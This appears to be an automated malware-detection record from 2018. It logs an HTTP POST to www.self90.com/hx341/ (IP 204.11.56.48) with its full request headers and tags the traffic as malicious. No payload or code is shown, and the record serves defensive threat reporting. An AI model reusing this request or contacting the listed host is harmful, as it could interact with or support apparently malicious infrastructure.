Referer: http://www.self90.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


http://www.self90.com/hx341/
  • Hostname: www.self90.com
  • IP Address: 204.11.56.48
  • Port: 80
  • Count: 1

POST /hx341/ HTTP/1.1
Host: www.self90.com
Connection: close
Content-Length: 57208
Cache-Control: no-cache
Origin: http://www.self90.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.self90.com/hx341/
Accept-Language: en-US
Accept-Encoding: gzip, deflate


#infosec #automation

TheSystem Itself @ 2018-06-06 19:57:19

Detected family: #Malicious

TheSystem Itself @ 2018-06-06 20:06:02